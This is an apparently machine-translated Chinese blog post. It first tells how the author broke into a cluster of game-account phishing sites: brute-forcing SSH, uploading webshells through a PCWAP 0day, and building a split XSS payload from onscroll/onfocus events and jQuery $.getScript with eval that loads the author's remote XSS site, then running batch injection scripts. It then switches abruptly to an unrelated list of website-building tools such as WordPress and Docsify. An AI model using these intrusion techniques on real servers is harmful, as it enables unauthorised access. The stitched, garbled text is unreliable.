厉害:攻破黑市之拿下吃鸡DNF等游戏钓鱼站群

　　厉害:攻破黑市之拿下吃鸡DNF等游戏钓鱼站群

　　前段时间有网友给我发了一个网站，说他们找到了一个钓鱼专用的链接网站，让我看看，然后引发了一系列事件。

　　网址如下：

　　当时没在意，一天无聊就开始干活。

　　直接打开

　　这是一个钓鱼站

　　让我们先对其进行一些研究

　　用谷歌语法搜索一下，看看是否有以下漏洞，

　　但一无所获

　　将此域名放入情报分析中查看

　　IP [162.247.96.114]

　　共发现230个域名更改了IP地址。

　　谁会在闲暇时注册这么多域名，肯定是用来做坏事的

　　查询此IP

　　162.247.96.114

　　开放端口：21(ftp)、80、102(ssh)、3306

　　爆破ssh端口也无济于事~

　　cms识别域名

　　结果是 PCWAP

　　PCWAP是一个小众的cms系统，手头只有一个PCWAP 0day。

　　无权限进入后台查看信息

　　修改文件上传类型，添加.php

　　然后我们上传图片LOGO，因为上传类型修改了，直接上传到马来西亚试试

　　上传一匹大马，一匹小马，一句话

　　这里大概有20个钓鱼网站，DNF，吃鸡

　　我尝试提升权限，但发现linux命令无法执行，可能是被禁止了

　　都是钓鱼站

　　我直接打包了所有的源代码，老实说，我很想对其进行代码审计，但我的代码审计并不是我的强项

　　

　　而且我好像钓到了网站，不过我当时没盲入，现在有源码了，一定会试试这里的过滤规则

　　因为自己不懂代码审计，所以拿到后台后，就用自己的经验来fuzz test

　　提交账号密码时抓包

　　进入paylaod

　　u=12312312&p=12312">1&bianhao=1

　　查看后台的回声

　　c标签执行成功，证明存在XSS漏洞，现在我们进一步测试一下

　　薪水

　　发现页面被屏蔽了，

　　警觉是危险人物吗？查看另一个活动

　　有效载荷：

　　弹窗成功，现在开始构建xss paylaod

　　如果你以前看过我的 文章，我已经发布了很多 xss paylaod of dogs

　　连接如下：

　　我们直接使用

　　有效载荷是

　　截取，在测试中查看

　　有效负载是，尝试对关键字符进行 HTML 编码

　　截获

　　尝试使用string.fromcharcode函数构造payload，还是不行

　　试了上百个payload，回声都被拦截了

　　结合我单身23年的经历，我发现这个xss过滤机制可能没有那么简单

　　通过不断的fuzz测试，发现对方的过滤机制大致如下：

　　截取带a的字符，过滤掉所有常见的onmouseover、onload等事件，最长点的最大长度为32个字符，过滤掉+和等特殊字符，也就是说a标签和各种编码机制都被过滤掉了都不能用~~ 真的很变态，不过我也通过测试得知可以执行的事件是onscroll,onfocus,onfocus，而且unciode代码没有过滤。未过滤的标签是 body、input、br、i 标签。

　　只能输入 32 个字符。我目前采集了20个最短的xss paylaod，就是script/src=//xs.xs，但是脚本早就被过滤了32个字符。我只能使用拆分跨站点。通过查看源代码，我发现了一个新想法。

　　就是他在后台调用的jquery框架，

　　由此，我自己开发了一个新的拆分跨站。

　　

　　这个想法是：

　　我们先构造一个函数，只要鼠标滚轮移动，让所有事件获得焦点，然后使用input标签启动onfocus函数，分别加载我的XSS站点（不明白的看代码以下）

　　代码如下，首先我们了解一些javascript事件和函数

　　onscroll 事件在元素滚动条滚动时触发

　　onfocus 事件在对象获得焦点时发生

　　还有浏览器的一些特性，当我们输入i标签时，不需要输入结束标签（原来完整的i标签是12312）

　　现在我们只需要输入 12312

　　我们进入后台查看以下

　　以下标签会自动填写

　　知道了这一点，看到最新的分叉跨站会容易很多。

　　拆分跨站代码如下

　　这段代码的意思是只要对方移动鼠标滚轮或者手机向下滑动就会产生一个事件 $(*).focus() 这是jq的选择器，意思是所有元素都获得焦点

　　然后下面两个input标签获取焦点，并且input标签中有一个事件onfocus，当input标签获取焦点时会触发onfocus函数，我在onfocus函数中的代码意思是获取i标签（即 $.getScript(//) )，并用 eval 执行，所以这段代码的整体执行效果是

　　只要对方移动滑轮，就会执行eval($.getScript(//))

　　如果你不明白，试试看

　　我们把xss paylad分成5段，分别输入

　　效果如下：

　　我已经成功加载了我的 XSS 站点，要获得这种类型的后端，我需要一个两位数的域名

　　根据本站的 关键词

　　幸运冒险者启航-心悦*敏*感*词*官方网站-腾讯游戏

　　老兵空降归来-PUBG官方网站-腾讯游戏（找不到吃鸡钓鱼站）

　　百度一搜，全钓界面

　　于是我写了一个批量攻击脚本，先使用这些钓鱼网址采集器采集，然后批量注入

　　效果如下

　　然后我分批渗透，我还写了一个批量渗透和钓鱼的脚本网站（我不打算发，怕被告知我传播黑客工具...）

　　我得到的大部分钓鱼网站好像没有账号密码，所以看到了这个吃鸡钓鱼站

　　我删了这哥们

　　一个钓鱼站每天有数百个账户密码。不知道有多少人被这样偷过QQ。

　　这个渗透可能有很多说法，请不要介意，这也是给XSS基础薄弱的同学考虑~

　　经验:很多网站，根本不用自己做！

　　对于大多数学生来说，拥有自己的 网站 很酷。还记得第一次自己建立个人博客的时候，真的很有成就感！

　　但不得不说，随着科技和开源的发展，如今现成的东西实在是太多了！如果你想拥有一个个人的网站，基本上不需要自己写代码，几分钟就可以轻松搞定。

　　来分享一波现成的、开箱即用的网站*敏*感*词*，对于想要快速搭建个人网站，甚至推出自己的产品的同学来说，绝对是非常不错的选择！

　　WordPress

　　开源建站系统可以轻松实现，从个人博客到企业电商平台。

　　WordPress 的强大之处在于 傻瓜式、多个主题和丰富的插件。

　　第一次使用 WordPress 时，只需免费获取其源代码，然后按照指南进行安装和配置网站。而且由于它的强大功能，现在许多云服务器都带有 WordPress 图像，因此您无需自己安装和部署它们！

　　一键在后台切换超过 8,000 个免费主题：

　　选择一个主题

　　WordPress 最强大的地方在于它的插件生态系统。通过安装插件，你可以为你的网站添加更丰富的功能，比如投票、表单、邮件发送、第三方登录、安全防护、搜索引擎优化等。你甚至可以通过Elementor插件进行可视化的页面制作.

　　视觉制作页面 Docsify

　　超级好用的文档站点*敏*感*词*！

　　其特点是易于使用。按照官网教程输入两行命令即可完成安装并生成站点。生成的文档样式也很简洁大方，而且响应式，在手机上很好看。

　　效果如下：

　　其实我们平时看到的很多文档和文章share网站都是用docsify生成的，不需要任何技术含量，让我们可以更专注于写文章而不是调整格式。

　　杜米

　　阿里推出的文档站点生成工具也可以通过输入几行命令来获取文档网站。

　　与 docsify 不同的是，Dumi 是针对组件开发场景设计的，非常适合作为组件库的文档。可以嵌入和折叠代码块，在终端提供组件浏览效果等，比如下面的移动组件库站点：

　　

　　移动组件预览

　　度米生成的网站非常小巧，而且封面支持自定义特征的展示，所以也非常适合作为项目或产品的官方文档。

　　图片厨师

　　阿里团队开发的页面*敏*感*词*，采用人工智能技术，一键根据设计稿智能生成代码！

　　使用方法很简单，只需要上传一个设计稿（PS、草图、图片等格式），就可以自动转换成相应的网页代码文件，甚至可以编辑内容、样式和事件网页随意！

　　比如我上传小坡站截图的时候，Img Cook 会自动识别几个内容框，然后我可以手动修改内容数据：

　　利用这个原理，我们还可以随意修改emoji包下的文字，是不是很神奇~

　　肯定有同学怀疑生成代码的质量，但其实阿里用这个工具为双11会场生成了一个新页面，90%以上的代码都可以直接使用！太可怕了。

　　蚂蚁设计登陆

　　蚂蚁开发的网站首页*敏*感*词*，平台提供丰富的首页模板，可以快速帮助我们推出专属的网站首页。

　　选择模板后，还可以对页面上的元素进行可视化编辑、添加新元素等，随心所欲地改变！

　　最酷的是，你还可以一键发布完成的网站！它使用vercel为我们提供了一个默认可访问的域名，无需购买域名和服务器。

　　（记得把生成地址中的“antlanding”去掉，否则无法访问）

　　腾讯兔窝

　　想要做好产品，就需要倾听用户的声音，不断接受他们的反馈并给出答案。

　　有了 Rabbit Nest，一切都变得更简单了。这是腾讯提供的免费专业的产品反馈平台，可以一键生成我们产品的专属反馈论坛，省去自己搭建社区的麻烦。

　　百度统计

　　要想经营好自己的网站，获得更多的用户，就必须做好网站的数据统计，并通过对数据的日常分析，了解用户的行为和喜好，所以以不断优化自己的网站。

　　

　　但是，自己开发网站统计函数非常麻烦。它需要前端的埋藏上报、后端的采集等，需要精心设计。不了解这些知识的学生连基本的统计功能都做不了。出来吧，更别说大数据分析和可视化了。

　　这时候可以选择百度统计，超级好用的中文网站分析平台，支持网站、APP、小程序、线下零售等多种场景，轻松满足我们的网站 数据自动化采集，统计和分析要求。

　　用户分析

　　功能强大不说，关键是这东西太简单好用，只需要一分钟，不写任何代码，就可以轻松访问百度统计，让它帮我们操作分析网站！

　　一个导航

　　很多导航网站只要一根头发！基本上它看起来像这样：

　　事实上，它是使用导航 网站 主题（例如 One Nav）自动生成的。本网站基于开源Web Stack项目二次开发，提供更好的体验，支持多引擎搜索、新闻、热搜等功能。

　　但美中不足的是，如果要直接使用所有功能，则必须付费。. .

　　Discuz

　　Discuz是几年前国内最知名的PC端开源社区软件。但由于移动互联网的发展，PC社区逐渐失去了重心，Discuz的发展也陷入了停滞。

　　但前段时间，腾讯将Discuz升级为Discuz！Q，是一款比较适合移动端的社区软件。它仍然是开源的，并且已经打通了微信生态系统（如微信支付）。

　　无需自己开发，触手可及即可拥有自己的社区。文章、视频、评论、点赞、关注、知识付费等等！

　　社区效果后台管理

　　后台管理平台可能是企业开发中最常见的需求。有前台的地方，通常就有后台，比如用户管理、商品管理、数据分析等。

　　所以现在网上也有很多现成的后台管理平台，基本都是用任何语言和框架实现的，比如vue-element-admin、react-admin、go-admin等，基本都是开箱即用，可以省略。重复搭建管理后台的麻烦。

　　Vue实现的管理后台

　　最后，虽然现成的网站真的很香，但是对于正在学习编程的同学来说，最好是用自己的心去做，能学到知识！也可以参考上面的网站来学习。

　　-结尾-

　　来源|程序员鱼皮

　　作者|鱼皮